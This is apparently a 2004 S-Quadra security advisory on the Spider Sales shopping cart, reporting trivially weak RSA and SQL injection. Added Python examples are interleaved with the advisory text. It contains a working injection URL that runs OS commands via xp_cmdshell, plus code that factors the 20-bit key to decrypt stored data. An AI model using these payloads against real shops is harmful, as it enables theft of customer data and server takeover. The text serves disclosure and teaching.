Adv-20040303.txt

Posted Mar 3, 2004
Authored by Nick Gudov | Site s-quadra.com

S-Quadra Advisory #2004-03-03 - Spider Sales shopping cart suffers from incorrect use of cryptography and SQL injection attacks.

tags | advisory, sql injection
SHA-256 | a0cda1fa27a49663003e77c116f1091e641af6fe9647acb9f89889f7983dc432

        S-Quadra Advisory #2004-03-03

Topic: Spider Sales shopping cart software multiple security vulnerabilities
Severity: High
Vendor URL: http://www.spidersales.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040303.txt
Release date: 03 Mar 2004

1. DESCRIPTION

"Spider Sales is a powerful shopping cart solution designed for small,
medium or large enterprises who want to sell their products on the
Internet market. You can use it to build any kind of Internet shop and
virtually sell anything." says the spidersales.com site. It is written in
ASP, runs on most Windows platforms and uses MS Access, MS SQL Server
or MySQL Server as a backend. Please visit http://www.spidersales.com
for more information about this shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

Spider Sales shopping cart software uses the RSA cryptosystem to encrypt
sensitive data before storing it in the database. RSA is a public-key
cryptosystem that offers both encryption and digital signatures
(authentication); see http://www.rsasecurity.com/rsalabs/faq/3-1-1.html
for background. In Spider Sales the modulus n is at most 20 bits long and
there is no minimum length, so an attacker can factor n into p and q by
plain trial division in a fraction of a second and compute the private
exponent d as the inverse of e modulo (p-1)(q-1). Moreover, the private
key is stored in the same database, in the same table as the public key,
so an attacker who gains read access to the store's database does not
even need to factor anything: the key is handed over together with the
ciphertext. Either way, every piece of "protected" information can be
decrypted.
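The factoring attack sketched above, worked through in Python as an added example (this is not Spider Sales code). The advisory states only that n is at most 20 bits; the primes p=1019 and q=1021, the public exponent e=65537 and the byte-at-a-time "textbook" RSA used to model the stored fields are constructed assumptions for the demonstration.

```python
"""Factoring a 20-bit RSA modulus and recovering the private key.

Added example, not Spider Sales code.  The advisory states only that the
modulus n is at most 20 bits; the key values, the public exponent
e=65537 and the byte-at-a-time textbook RSA used to model the stored
fields are constructed assumptions for this demonstration.
"""
from math import isqrt


def factor_small_modulus(n):
    """Trial division: for n < 2**20 this tries at most ~512 odd candidates,
    so the 'private' factors fall out in microseconds."""
    if n % 2 == 0:
        return 2, n // 2
    for p in range(3, isqrt(n) + 1, 2):
        if n % p == 0:
            return p, n // p
    raise ValueError("n is prime or not a product of two primes")


def modinv(a, m):
    """Modular inverse by the extended Euclidean algorithm."""
    old_r, r = a % m, m
    old_s, s = 1, 0
    while r:
        q = old_r // r
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
    if old_r != 1:
        raise ValueError("no inverse: gcd(a, m) != 1")
    return old_s % m


def recover_private_exponent(n, e):
    """What an attacker does with the public key (n, e) alone:
    factor n, then d = e^-1 mod (p-1)(q-1)."""
    p, q = factor_small_modulus(n)
    return modinv(e, (p - 1) * (q - 1))


def textbook_encrypt(n, e, data):
    """Model of the stored ciphertext: each plaintext byte m < n becomes
    m**e mod n.  No padding, so identical bytes give identical blocks."""
    return [pow(b, e, n) for b in data]


def textbook_decrypt(n, d, blocks):
    return bytes(pow(c, d, n) for c in blocks)


def demo():
    # Constructed 20-bit key: p and q are primes, n = 1040399 < 2**20.
    p, q, e = 1019, 1021, 65537
    n = p * q
    stored = textbook_encrypt(n, e, b"sample-card-0000")   # what the DB holds
    d = recover_private_exponent(n, e)                       # attacker's step
    return {"bits": n.bit_length(), "d": d,
            "recovered": textbook_decrypt(n, d, stored)}


if __name__ == "__main__":
    print(demo())
```

Note that under the byte-sized-block assumption made here, factoring is not even required: with no padding an attacker could encrypt all 256 possible byte values under the public key and match them against the stored blocks. Either route shows why a key that fits in 20 bits offers no confidentiality at all.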

-- Vulnerability 2: SQL Injection vulnerability

A substantial number of scripts in Spider Sales do not filter the
'userId' parameter, so an attacker can alter the SQL query and carry
out SQL injection attacks.

Successful exploitation of this vulnerability could allow an attacker
to gain access to the Spider Sales administrator interface and read any
information from the store's database (e.g. customers' private data).
With MS SQL Server as the backend, an attacker could also execute
operating-system commands through the xp_cmdshell extended stored
procedure, provided the application's database login is allowed to run
it (by default only members of the sysadmin role are).

--PoC code

--Vulnerability 2:

Platform: MS SQL Server as a backend

The following request runs the command dir c: and saves the output to
c:\inetpub\wwwroot\dirc.txt (the default IIS web root, so the result can
then be retrieved with a browser):

http://[target]/Carts/Computers/viewCart.asp?userID=2893225125722634';exec%20master..xp_cmdshell%20'dir%20c:%20>%20c:\inetpub\wwwroot\dirc.txt'--&viewID=48
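The injection described in Vulnerability 2 and the PoC request above, worked through in Python as an added example (not Spider Sales code). The advisory does not publish the vulnerable ASP, so the table name Cart, the column userId and the shape of the query are assumptions that reproduce the behaviour it describes; the query string itself is copied from the PoC URL.

```python
"""The userID injection from the advisory, reproduced and then closed.

Added example, not Spider Sales code.  The advisory does not publish the
vulnerable ASP, so the table and column names (Cart, userId) and the
query shape are assumptions; the PoC query string is the advisory's own,
decoded here the way IIS hands it to Request.QueryString.
"""
import re
import sqlite3
from urllib.parse import unquote_plus

# Query string of the advisory's PoC request (host and path omitted).
POC_QUERY = ("userID=2893225125722634';exec%20master..xp_cmdshell%20"
             "'dir%20c:%20>%20c:\\inetpub\\wwwroot\\dirc.txt'--&viewID=48")


def decode_user_id(query_string):
    """URL-decode the userID parameter as the server-side script sees it."""
    for pair in query_string.split("&"):
        name, _, value = pair.partition("=")
        if name == "userID":
            return unquote_plus(value)
    raise KeyError("userID")


def build_query_vulnerable(user_id):
    """Assumed shape of the flawed code: the raw parameter is concatenated
    into the SQL text, e.g. in classic ASP
        "SELECT * FROM Cart WHERE userId = '" & Request("userID") & "'"
    With the PoC value the quote closes the literal, ';exec ...' appends a
    second statement (SQL Server runs the whole batch) and '--' comments
    out the trailing quote the script adds."""
    return "SELECT * FROM Cart WHERE userId = '" + user_id + "'"


def validate_user_id(raw):
    """Allowlist: a userId is a decimal integer and nothing else."""
    if not re.fullmatch(r"[0-9]{1,20}", raw):
        raise ValueError("userID must be numeric")
    return int(raw)


def is_accepted(raw):
    try:
        validate_user_id(raw)
        return True
    except ValueError:
        return False


def lookup_cart(conn, raw_user_id):
    """Hardened path: validate first, then bind the value as a parameter so
    the driver never interprets it as SQL."""
    user_id = validate_user_id(raw_user_id)
    cur = conn.execute("SELECT item FROM Cart WHERE userId = ?", (user_id,))
    return cur.fetchall()


def parameter_is_inert(conn, hostile):
    """Even without the allowlist a bound parameter is only data: the
    hostile string is compared against userId and matches nothing."""
    cur = conn.execute("SELECT item FROM Cart WHERE userId = ?", (hostile,))
    return cur.fetchall()


def make_demo_db():
    """Constructed in-memory stand-in for the store database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Cart (userId INTEGER, item TEXT)")
    conn.executemany("INSERT INTO Cart VALUES (?, ?)",
                     [(2893225125722634, "monitor"), (42, "keyboard")])
    return conn


if __name__ == "__main__":
    payload = decode_user_id(POC_QUERY)
    print("decoded userID :", payload)
    print("resulting SQL  :", build_query_vulnerable(payload))
    db = make_demo_db()
    print("hardened lookup:", lookup_cart(db, "2893225125722634"))
    print("payload bound  :", parameter_is_inert(db, payload))
    print("payload passes allowlist:", is_accepted(payload))
```

The vulnerable string is only displayed, not executed: sqlite3's execute() refuses a batch with more than one statement, whereas ADO against SQL Server runs the whole batch, which is exactly what the PoC relies on. The fix has two independent layers, the numeric allowlist and parameter binding, so a mistake in one does not reopen the hole.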

3. FIX INFORMATION

S-Quadra alerted Spider Sales development team to these issues on 25
Feb 2004. No response has been received. No fix information has been
provided.

4. CREDITS

Nick Gudov <cipher@s-quadra.com> has detected above mentioned
vulnerabilities.

5. ABOUT

S-Quadra dedicates its substantial knowledge and resources to managing
clients' IT security risks. S-Quadra audits and protection for software
and networks implement pioneering methods and ground-breaking
technologies.
